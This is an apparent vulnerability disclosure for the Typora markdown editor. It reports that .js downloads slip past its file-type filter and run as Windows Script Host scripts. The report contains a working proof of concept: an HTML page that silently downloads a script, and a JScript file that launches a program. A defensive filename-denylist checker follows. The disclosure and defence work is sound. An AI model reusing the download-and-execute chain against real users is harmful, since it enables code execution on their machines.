Closed
Description
Although Typora filters most dangerous suffixes, it still retains the .js file type, which will be recognized as WSH (Windows Script Host) JScript on the Windows operating system. Users who click on an evil markdown file may cause code execution.
Version: 0.9.78-1.5.5(latest)
Attachment
poc.html
<!-- auto download !-->
<html>
<script>
var blob = new Blob(['var WshShell = new ActiveXObject("WScript.Shell");var ret = WshShell.run("calc");if (ret == 0)WScript.Echo("You were hacked.");WScript.Quit();'],{type:'application/js'});
var a = document.createElement('a');
a.href = window.URL.createObjectURL(blob);
a.download = 'poc.js';
a.click();
</script>
</html>
<!-- click to download !-->
<a href="http://127.0.0.1:8000/poc.js" download="poc.js">CLICK~~</a>
poc.js
var WshShell = new ActiveXObject("WScript.Shell");
var ret = WshShell.run("calc");
if (ret == 0)
    WScript.Echo("You were hacked.")
WScript.Quit();
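A defender-side check for the gap the report describes, as an added example that is not Typora's code and not part of the original report: it resolves a download's file name the way Windows will and rejects Windows Script Host types, including .js. The extension list and the function names are assumptions chosen for illustration.

```javascript
// Added example: denylist check for a download's file name on Windows.
// The extension list is illustrative, not Typora's actual filter.
const BLOCKED_EXTENSIONS = new Set([
  // Windows Script Host types (the report's poc.js falls in this group)
  'js', 'jse', 'vbs', 'vbe', 'wsf', 'wsh',
  // Other types Windows runs when opened from Explorer
  'exe', 'com', 'scr', 'pif', 'bat', 'cmd', 'hta', 'msi', 'lnk',
]);

// Reduce a name to the extension Windows will act on when the file is opened.
function effectiveExtension(fileName) {
  // Keep only the last path component, for both separator styles.
  let name = String(fileName).split(/[\\/]/).pop();
  // Drop an NTFS alternate data stream suffix ("poc.js::$DATA").
  const colon = name.indexOf(':');
  if (colon !== -1) name = name.slice(0, colon);
  // Win32 strips trailing dots and spaces, so "poc.js. " opens as "poc.js".
  name = name.replace(/[. ]+$/, '');
  const dot = name.lastIndexOf('.');
  // Extensions are case-insensitive on Windows.
  return dot === -1 ? '' : name.slice(dot + 1).toLowerCase();
}

function isBlockedDownload(fileName) {
  return BLOCKED_EXTENSIONS.has(effectiveExtension(fileName));
}

// Constructed sample names, not taken from the report apart from poc.js.
const samples = [
  'poc.js', 'POC.JS', 'poc.js. ', 'notes.md.jse',
  'poc.js::$DATA', 'notes.md', 'image.png',
];
for (const s of samples) {
  console.log(JSON.stringify(s), isBlockedDownload(s) ? 'blocked' : 'allowed');
}
```

An allowlist of the document and image types the editor actually needs is the stricter design, since a denylist only covers the types someone remembered to list.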